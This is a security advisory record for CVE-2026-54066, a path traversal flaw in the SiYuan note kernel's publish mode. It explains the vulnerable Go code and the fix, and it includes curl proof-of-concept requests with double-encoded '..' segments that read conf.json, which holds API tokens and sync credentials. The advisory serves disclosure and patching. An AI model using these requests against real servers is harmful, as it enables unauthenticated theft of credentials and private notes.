{"id":"CVE-2026-54066","aliases":["GHSA-p4m3-mgmm-c664"],"title":"SiYuan: Path Traversal via Double URL Encoding in /assets/*path (publish mode arbitrary   file─read), Incomplete fix of CVE-2026-41894 ","summary":"SiYuan: Path Traversal via Double URL Encoding in /assets/*path (publish mode arbitrary   file─read), Incomplete fix of CVE-2026-41894 ","severity":"high","cvss":7.5,"cwe":["CWE-22","CWE-23","CWE-1188"],"vendor":"siyuan-note","product":"github.com/siyuan-note/siyuan/kernel","ecosystem":"go","affected":["github.com/siyuan-note/siyuan/kernel < 0.0.0-20260628153353-2d5d72223df4"],"patched":["github.com/siyuan-note/siyuan/kernel 0.0.0-20260628153353-2d5d72223df4"],"published":"2026-07-10","updated":"2026-07-10","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-p4m3-mgmm-c664","references":[{"url":"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-p4m3-mgmm-c664"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-54066"},{"url":"https://github.com/advisories/GHSA-p4m3-mgmm-c664"}],"tags":["ghsa","go"],"epss":0.01892,"epssPercentile":0.77137,"ingestedAt":"2026-07-10T20:06:10.924Z","slug":"CVE-2026-54066","body":"## Overview\n\n## Summary\n  The patch for CVE-2026-41894 (\"Path Traversal via Double URL Encoding\") sanitized the `/export/` route but the\n  **identical root cause remains in the `/assets/*path` route**. In publish mode (anonymous read-only HTTP endpoint,\n  default port 6808), an unauthenticated remote attacker can read arbitrary files inside `WorkspaceDir` — including\n  `conf/conf.json` (which contains the `AccessAuthCode` SHA256 hash, API token, and sync keys), `temp/siyuan.db`,\n  `temp/blocktree.db`, and `siyuan.log` — by double-URL-encoding `..` segments.\n\n  Verified against siyuan v3.6.5:\n  - `GET /assets/%252e%252e/%252e%252e/conf/conf.json` → **HTTP 200, 10349 bytes (conf.json served)**\n  - `GET /export/%252e%252e/%252e%252e/conf/conf.json` → HTTP 401 (patched)\n  - `GET /assets/%2e%2e/conf/conf.json` → HTTP 404 (single-decode handled correctly)\n\n  ## Vulnerable Code\n\n  **Step 1 — route & first decode** (`kernel/server/serve.go:587-626`):\n  The router registers `GET /assets/*path` for the publish listener. Gin performs one URL decoding pass on `URL.Path`,\n  so a request for `/assets/%252e%252e/...` yields `context.Param(\"path\") == \"/%2e%2e/%2e%2e/conf/conf.json\"` — literal\n  `%2e%2e` strings, which `path.Clean` cannot collapse.\n\n  **Step 2 — second decode via fallback** (`kernel/model/assets.go:536-563`, `GetAssetAbsPath`):\n  ```go\n  p, err := getAssetAbsPath(relativePath)\n  if nil != err {\n      // fallback\n      decoded, e := url.PathUnescape(relativePath)   // ← line 548, second decode\n      if nil == e {\n          p, err = getAssetAbsPath(decoded)\n      }\n  }\n  ```\n  After the fallback decodes `%2e%2e` to `..`, `filepath.Join(DataDir, \"../../conf/conf.json\")` is `Clean`-ed to\n  `WorkspaceDir/conf/conf.json`, an existing file.\n\n  **Step 3 — publish-mode access gate fall-through** (`kernel/model/publish_access.go:288`,\n  `CheckAbsPathAccessableByPublishAccess`):\n  ```go\n  if !filelock.IsSubPath(util.DataDir, absPath) {\n      return true   // ← fall-through allows anything outside DataDir but inside WorkspaceDir\n  }\n  ```\n  Because the resolved file is *outside* `DataDir` (it's in `WorkspaceDir`), the gate returns `true` and\n  `IsSensitivePath()` is never invoked — `.db` / `.log` / `conf/` denylists do not apply to the `/assets/` route at all\n  (unlike the patched `/export/` route, which additionally checks `IsSubPath(exportBaseDir, ...)`).\n\n  **Step 4 — file served** (`http.ServeFile`): the request `URL.Path` contains literal `%2e%2e`, not `..`, so Go's\n  `containsDotDot` guard passes and the file is sent.\n\n  ## PoC\n\n  Preconditions: siyuan kernel running with publish mode enabled (`conf.publish.enable = true`). Publish mode is the\n  documented anonymous read-only endpoint for sharing notebooks.\n\n  ```\n  $ curl -i \"http://victim:6808/assets/%252e%252e/%252e%252e/conf/conf.json\"\n  HTTP/1.1 200 OK\n  Content-Length: 10349\n  Content-Type: application/json\n  ...\n  {\"appearance\":{...},\"editor\":{...},\"system\":{...},\"accessAuthCode\":\"<sha256>\",\"api\":{\"token\":\"<api token>\"}, ...}\n  ```\n\n  Compared with the patched route:\n  ```\n  $ curl -i \"http://victim:6808/export/%252e%252e/%252e%252e/conf/conf.json\"\n  HTTP/1.1 401 Unauthorized\n  ```\n\n  ## Root Cause\n  Three independent flaws combine:\n  1. `GetAssetAbsPath` performs a second `url.PathUnescape` as a \"compatibility\" fallback, re-introducing the\n  double-decode primitive that the CVE-2026-41894 patch eliminated on `/export/`.\n  2. `CheckAbsPathAccessableByPublishAccess` returns `true` for any path outside `DataDir`, even when that path is still\n   inside `WorkspaceDir` (which contains `conf/conf.json`, `temp/*.db`, `siyuan.log`).\n  3. The `IsSensitivePath()` denylist applied to `/export/` is not called from the `/assets/` handler.\n\n  ## Impact\n  Unauthenticated remote arbitrary file read inside `WorkspaceDir`. Confirmed-readable files include:\n  - `conf/conf.json` — `accessAuthCode` SHA256 (offline crackable), API token, S3/WebDAV sync credentials.\n  - `temp/siyuan.db`, `temp/blocktree.db`, `temp/asset_content.db` — full notebook content (SQLite).\n  - `siyuan.log` — internal paths, OS username, plugin info.\n\n  Compromise of `accessAuthCode` / API token escalates to authenticated kernel API access (full read/write of all\n  notebooks). Compromise of sync credentials escalates beyond the host.\n\n  ## Fix\n  1. Remove the `url.PathUnescape` fallback in `GetAssetAbsPath` (assets.go:548), matching the `/export/` patch.\n  2. In `CheckAbsPathAccessableByPublishAccess`, replace the `IsSubPath(DataDir, ...)` fall-through with an explicit\n  allowlist (only `DataDir` and its publishable subtree) and **always** call `IsSensitivePath()`.\n  3. Apply `IsSensitivePath()` inside the `/assets/*path` handler in `serve.go` as defense-in-depth.\n\n  ## Status\n  Privately reported via GitHub Security Advisory. PoC reproduced locally against v3.6.5 (publish port 6808): `GET\n  /assets/%252e%252e/%252e%252e/conf/conf.json` returned HTTP 200 / 10349 bytes.\n\n## Affected packages\n\n- `github.com/siyuan-note/siyuan/kernel < 0.0.0-20260628153353-2d5d72223df4`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `github.com/siyuan-note/siyuan/kernel 0.0.0-20260628153353-2d5d72223df4`","depth":"twilight","depthScore":42,"depthScoreParts":{"impact":41.3,"likelihood":0.4,"exploitation":0,"ransomware":0},"changes":[]}